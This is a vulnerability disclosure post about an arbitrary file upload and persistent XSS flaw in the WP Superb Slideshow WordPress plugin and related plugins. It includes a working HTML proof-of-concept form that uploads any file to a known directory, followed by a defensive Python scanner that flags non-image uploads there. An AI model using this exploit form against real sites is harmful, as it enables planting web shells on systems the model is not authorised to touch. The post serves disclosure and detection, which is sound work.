In monitoring our websites for hacking attempts we recently have been finding vulnerabilities that exist in the current versions of plugins. The latest such incident has led us to find that 15 plugins contained the same serious vulnerability we had just spotted in the plugin Vertical Slideshow. For whatever reason, the Plugin Directory website didn't indicate that the developer of that plugin had any other plugins (while it normally would).
We first realized there were more when we had a request for a file from the WP Superb Slideshow plugin, /wp-content/plugins/wp-superb-slideshow/css/default.css. In looking into that plugin we noticed it was from the same developer as the first plugin. Then we realized it shared the same vulnerable code as the first one, described in more detail in the post on that vulnerability, which allows for arbitrary file uploads (as well as persistent cross-site scripting (XSS) and possibly other security issues). That is the case as of version 2.4 of the plugin.
While we were trying to see if the developer had any more plugins, we came across another account they had used for some of their plugins, and then we found that in total there are 16 plugins sharing the same code, making them all vulnerable (two of them are only vulnerable to the persistent cross-site scripting (XSS) issue). Those will be documented in follow-up posts.
Proof of Concept
The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/superb/1_uploadfolder/big/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
  <body>
    <form action="http://[path to WordPress]/wp-admin/admin.php?page=superb_manage" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="task" value="superb_add_new_album" />
      <input type="hidden" name="album_name" value="Arbitrary File Upload" />
      <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
      <input type="file" name="album_img" value="" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>
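Because the plugin writes whatever is uploaded into a known location under wp-content/uploads/superb/, a site owner can check that directory for files that are not images. The script below is an added example written for this post; it is not code from the post or from the plugin. It builds a constructed sample tree in the layout named above (superb/1_uploadfolder/big/), then flags any file whose extension is not an image extension or whose leading bytes do not match a JPEG, PNG or GIF signature. The file names and contents in the sample tree are constructed for the demonstration.

```python
"""Scan a WordPress uploads tree for files that are not what an image
upload should be. Added example, not part of the original post; the
directory layout mirrors the upload location the post names
(wp-content/uploads/superb/<n>_uploadfolder/big/) and the sample files
are constructed here for demonstration."""
import os
import tempfile

# Leading bytes of the image formats a slideshow category image should be.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def sniff_image_type(path):
    """Return the image type implied by the file's leading bytes, or None."""
    with open(path, "rb") as fh:
        head = fh.read(16)
    for sig, kind in IMAGE_SIGNATURES.items():
        if head.startswith(sig):
            return kind
    return None


def classify_upload(path):
    """Return the reasons a file looks suspicious (an empty list means it looks fine).

    Both checks matter: a .php file is caught by the extension check, while a
    file named .jpg that actually holds script text is caught by the signature
    check.
    """
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_EXTENSIONS:
        reasons.append("non-image extension %s" % (ext or "(none)"))
    if sniff_image_type(path) is None:
        reasons.append("content does not start with a known image signature")
    return reasons


def find_suspicious_uploads(root):
    """Walk the tree under root; map each flagged file (relative path, '/' separated) to its reasons."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = classify_upload(full)
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                flagged[rel] = reasons
    return flagged


def build_sample_tree(base):
    """Create a constructed sample uploads directory in the post's layout."""
    big = os.path.join(base, "superb", "1_uploadfolder", "big")
    os.makedirs(big)
    samples = {
        "banner.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,         # genuine JPEG header
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,          # genuine PNG header
        "shell.php": b"<?php /* constructed placeholder */ ?>",  # wrong extension and content
        "photo.jpg": b"<?php /* constructed placeholder */ ?>",  # image name, script content
    }
    for name, data in samples.items():
        with open(os.path.join(big, name), "wb") as fh:
            fh.write(data)
    return os.path.join(base, "superb")


def demo():
    """Build the sample tree in a temporary directory and return the flagged files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        return find_suspicious_uploads(root)


if __name__ == "__main__":
    # On a real site, point find_suspicious_uploads() at wp-content/uploads/superb/.
    for rel, why in sorted(demo().items()):
        print("%s: %s" % (rel, "; ".join(why)))
```

On a live site, run find_suspicious_uploads() against wp-content/uploads/superb/ rather than the constructed tree; a PHP file there, or an image-named file that does not carry an image signature, is a strong indicator that the upload issue has been used and the file should be removed and the site reviewed.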
- 6/7/2016 – WordPress.org Plugin Directory notified.